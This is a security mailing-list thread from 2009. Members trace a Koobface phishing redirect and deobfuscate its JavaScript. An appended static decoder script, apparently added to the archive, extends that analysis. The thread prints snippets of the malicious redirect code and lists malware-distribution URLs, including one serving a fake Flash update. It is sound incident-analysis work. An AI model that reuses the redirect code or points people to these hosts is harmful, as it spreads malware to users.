PaulDotCom mailing list archives
phishing question
From: d.auclair at utoronto.ca (David Auclair)
Date: Thu, 3 Dec 2009 08:52:53 -0500
The URL is encoded in this line:

    n516dc="hfdftfktfffkpfj:gjj/j/gfwwkdwdf.bujkskifnjfekdsgfsginkadboxj.cgojfmfkg.fjafkgugf/jfk3jfk5k7kj/fgg".replace(/[fdkjg]+/g,"");

The replace command as used here is basically replacing the specified characters with 'nothing'... so once you've stripped out all the fdkjg characters, this is what's left:

    n516dc="http://www.businessinabox.com.au/357/";

For anybody who's interested, the full decoded (and somewhat simplified and commented) script is as follows:

    oa8ea5=eval("document.referrer").indexOf("msplinks.com");
    pab=eval("document.referrer").indexOf("myspace.com");
    qa53a=eval("document.referrer").indexOf("lnk.ms");
    // If the referrer contains any of the above strings, then append '&ms' to the query
    bf2ebbb9='';
    if(oa8ea5+pab+qa53a!=-3)bf2ebbb9='&ms';
    location="http://www.businessinabox.com.au/357/?go"+bf2ebbb9;

The script at the specified location is what actually redirects to the attack sites...

-Dave

From: pauldotcom-bounces at pdc-mail.pauldotcom.com [mailto:pauldotcom-bounces at pdc-mail.pauldotcom.com] On Behalf Of Chris Blazek
Sent: Wednesday, December 02, 2009 2:28 PM
To: PaulDotCom Security Weekly Mailing List
Subject: Re: [Pauldotcom] phishing question

That section you unwrapped looks like it sets a location variable that is then used in the google friend connect stuff. I went looking through the script blocks and I'm not finding any reference to the businessinabox site. How did you get to that point? Just curious, trying to learn.

Chris

On Wed, Dec 2, 2009 at 1:01 PM, Chris Blazek <chris.blazek at gmail.com> wrote:

Thanks! The user sent me a snapshot of symantec finding the koobface infection. I found a mcafee article that mentions the worm on what David found: http://vil.nai.com/vil/content/v_148955.htm

I was trying to use malzilla to decode that script block but really didn't have much luck because of my experience with the app.

Thanks for the help, great community!
Chris

On Wed, Dec 2, 2009 at 12:03 PM, David Auclair <d.auclair at utoronto.ca> wrote:

The obfuscation wasn't too bad in this case... Just a couple of tricks repeated over and over. I manually 'unwrapped' the layers of obfuscation, and ended up with some pretty simple code. For example:

    c4239='do';
    db749="coaujoimrggh".replace(/[oajirgh]+/g,"");
    eaf76='ent.r';
    f638e36f4="esgkfkusueduvrbo".replace(/[sgkudvbo]+/g,"");
    gda746b57='rer';
    a206c=eval(c4239+db749+eaf76+f638e36f4+gda746b57);

is basically a set of strings containing extra characters, that are stripped out by the replace commands, then merged. This can be simplified to:

    c4239='do';
    db749="cum";
    eaf76='ent.r';
    f638e36f4="efer";
    gda746b57='rer';
    a206c=eval("document.referrer");

-Dave
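As an added example (not code from the thread, and not part of Malzilla or any other tool mentioned in it), here is a small static decoder in JavaScript for the two idioms David unwrapped by hand: the "literal".replace(/[chars]+/g,"") trick and the eval(a+b+c) concatenation of string variables. It never executes the script; it only pattern-matches and rewrites the source text, so it can be run over a script block copied out of a page. The function names (stripChars, decodeReplaces, resolveEvalArgs, extractUrls) are my own, and the sample inputs are the two snippets quoted in the messages above; it is written for exactly those idioms, not for arbitrary JavaScript.

```javascript
"use strict";
// Added example: static decoder for the replace()-based string obfuscation
// discussed in this thread. Nothing here is eval()ed; the source text is only
// pattern-matched and rewritten.
//   idiom 1: "literal".replace(/[chars]+/g,"")  -> drop the listed characters
//   idiom 2: eval(a+b+'c')                       -> join known string variables
// Function and constant names are my own; the samples at the bottom are the
// snippets quoted in the thread.

// Matches "literal".replace(/[chars]+/g,"") with either quote style around the literal.
const REPLACE_RE =
  /(["'])((?:(?!\1)[^\\\n])*)\1\.replace\(\/\[([^\]]+)\]\+\/g,\s*(["'])\4\)/g;

// Matches simple `name = "literal";` assignments.
const ASSIGN_RE = /([A-Za-z_$][\w$]*)\s*=\s*(["'])((?:(?!\2)[^\\\n])*)\2\s*;/g;

// Plain http(s) URLs, used to pull indicators out of the decoded text.
const URL_RE = /https?:\/\/[^\s"'<>]+/g;

// What the script's own .replace(/[chars]+/g,"") would produce, done by hand.
function stripChars(literal, charClass) {
  const junk = new Set(charClass);
  return Array.from(literal).filter((c) => !junk.has(c)).join("");
}

// Pass 1: rewrite every replace() idiom into the plain literal it produces.
function decodeReplaces(src) {
  return src.replace(REPLACE_RE, (_m, q, literal, cls) => q + stripChars(literal, cls) + q);
}

// Pass 2: collect the string variables the script builds up.
function collectStrings(src) {
  const vars = new Map();
  for (const m of src.matchAll(ASSIGN_RE)) vars.set(m[1], m[3]);
  return vars;
}

// Pass 3: resolve eval(a+b+'c') when every operand is a known variable or a
// string literal; anything unresolved is left untouched rather than guessed at.
function resolveEvalArgs(src, vars) {
  return src.replace(/eval\(([^()]*)\)/g, (whole, inner) => {
    const out = [];
    for (const part of inner.split("+").map((p) => p.trim())) {
      const lit = part.match(/^(["'])(.*)\1$/);
      if (lit) out.push(lit[2]);
      else if (vars.has(part)) out.push(vars.get(part));
      else return whole;
    }
    return `eval(${JSON.stringify(out.join(""))})`;
  });
}

function deobfuscate(src) {
  const decoded = decodeReplaces(src);
  return resolveEvalArgs(decoded, collectStrings(decoded));
}

// Indicators (URLs) visible once the strings are decoded.
function extractUrls(src) {
  return Array.from(new Set(deobfuscate(src).match(URL_RE) || []));
}

// Samples copied from the messages in this thread.
const SAMPLE_REFERRER = `c4239='do'; db749="coaujoimrggh".replace(/[oajirgh]+/g,""); eaf76='ent.r'; f638e36f4="esgkfkusueduvrbo".replace(/[sgkudvbo]+/g,""); gda746b57='rer'; a206c=eval(c4239+db749+eaf76+f638e36f4+gda746b57);`;
const SAMPLE_URL = `n516dc="hfdftfktfffkpfj:gjj/j/gfwwkdwdf.bujkskifnjfekdsgfsginkadboxj.cgojfmfkg.fjafkgugf/jfk3jfk5k7kj/fgg".replace(/[fdkjg]+/g,"");`;

if (typeof require !== "undefined" && require.main === module) {
  console.log(deobfuscate(SAMPLE_REFERRER)); // ends with a206c=eval("document.referrer");
  console.log(deobfuscate(SAMPLE_URL));      // n516dc="http://www.businessinabox.com.au/357/";
  console.log(extractUrls(SAMPLE_URL));
}
```

The point of doing it statically rather than pasting the block into a browser console is that the decoded strings (the referrer check, the redirect URL) are recovered without ever giving the script a chance to run; a literal containing a '+' or a nested eval would need a real parser, and the decoder deliberately leaves such cases unchanged instead of guessing.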
-----Original Message-----
From: pauldotcom-bounces at mail.pauldotcom.com [mailto:pauldotcom-bounces at mail.pauldotcom.com] On Behalf Of David Shpritz
Sent: Wednesday, December 02, 2009 12:44 PM
To: PaulDotCom Security Weekly Mailing List
Subject: Re: [Pauldotcom] phishing question

Hey David,

Would you mind telling us what method you used to deobfuscate the scripts? Usually I have done these by hand or used Malzilla, but I'm always looking for new methods.

Thanks!
David Shpritz

-----Original Message-----
From: pauldotcom-bounces at pdc-mail.pauldotcom.com [mailto:pauldotcom-bounces at pdc-mail.pauldotcom.com] On Behalf Of David Auclair
Sent: Wednesday, December 02, 2009 9:45 AM
To: PaulDotCom Security Weekly Mailing List
Subject: Re: [Pauldotcom] phishing question

It looks like the javascript on the page you mentioned leads to this page:

hxxp://www . businessinabox . com . au/357/?go

which is full of more obfuscated javascript, which leads to sites such as:

hxxp:// 62.204.113.141 /d=www.facebook.com/0x3E8/f=fb2/view/console=yes/

which seems to have a 'you need to update your flash player' image, linking to setup.exe. According to virustotal, the setup.exe contains koobface:
http://www.virustotal.com/analisis/5e9ce9c41a8f46d5dfc4ce366f6f47cb347bcbaa93cd1fcb132a72f61bab14e1-1259705119

-Dave

-----Original Message-----
From: pauldotcom-bounces at mail.pauldotcom.com [mailto:pauldotcom-bounces at mail.pauldotcom.com] On Behalf Of Chris Blazek
Sent: Wednesday, December 02, 2009 12:04 AM
To: PaulDotCom Security Weekly Mailing List
Subject: Re: [Pauldotcom] phishing question

PJ,

Yeah, I had the user change all passwords from the email account to fb. I had tried googling for that 1st part of the address, hoping someone had posted something about it. That came up empty. I tried to get malzilla to decode it, but I really have little experience decoding JavaScript like that. I'll try looking for deobfuscators to see if something else can decode it.

Sorry for the typos in the original email. :)

Thanks for the help!
Chris

On Dec 1, 2009, at 8:47 PM, PJ McGarvey <pj_mcgarvey at hotmail.com> wrote:

Well, if you mean what does the obfuscated code do, there are a few sites I've used that can "de-obfuscate" code, however sometimes all that can tell you is that "yeah, it's probably malicious". I would google for "javascript deobfuscate". You could submit the blogspot site to an online sandbox for analysis, like I just did:
http://anubis.iseclab.org/?action=result&task_id=1c4a179271c4d4ee4f5b9820e431f7281&format=html
and possibly find other URLs found in the de-obfuscated code to see what they do.... like this one http://1nonsensical.cn/?pid=312s02&sid=4db12f ...

I've yet to find a .cn domain name I could trust. LOL. Follow down the rabbit hole... That way you can find out if the PC was infected, and how to clean it up. Otherwise it would seem like some sort of facebook worm that spreads using the FB address book. Was the user logged into Facebook at the time? Might be a good idea to change their password; sounds like it either used the active facebook session to send itself out, or maybe a cookie with the user's saved credentials.

PJ

From: chris.blazek at gmail.com
Date: Tue, 1 Dec 2009 14:54:36 -0600
To: pauldotcom at mail.pauldotcom.com
Subject: [Pauldotcom] phishing question

A coworker clicked on a link in an email and was directed to facebook, then redirected to the following site: despatiesmercemerce . blogspot . com

All of their fb contacts then received the same email. I pulled up the site in malzilla and noticed a script block in the header that looks like it's obfuscated. I was wondering if someone in the group could figure out what the site was trying to do.
Thanks,
Chris

_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

--
http://www.kingbin.net/
Sent from Lubbock, TX, United States
Current thread:
- phishing question Chris Blazek (Dec 01)
- phishing question PJ McGarvey (Dec 01)
- phishing question Chris Blazek (Dec 01)
- phishing question David Auclair (Dec 02)
- phishing question David Shpritz (Dec 02)
- phishing question David Auclair (Dec 02)
- phishing question Chris Blazek (Dec 02)
- phishing question Chris Blazek (Dec 02)
- phishing question David Auclair (Dec 03)
- phishing question Chris Blazek (Dec 01)
- phishing question PJ McGarvey (Dec 01)
- phishing question Chris Blazek (Dec 03)
- phishing question Matt Erasmus (Dec 03)
- phishing question Jim Halfpenny (Dec 04)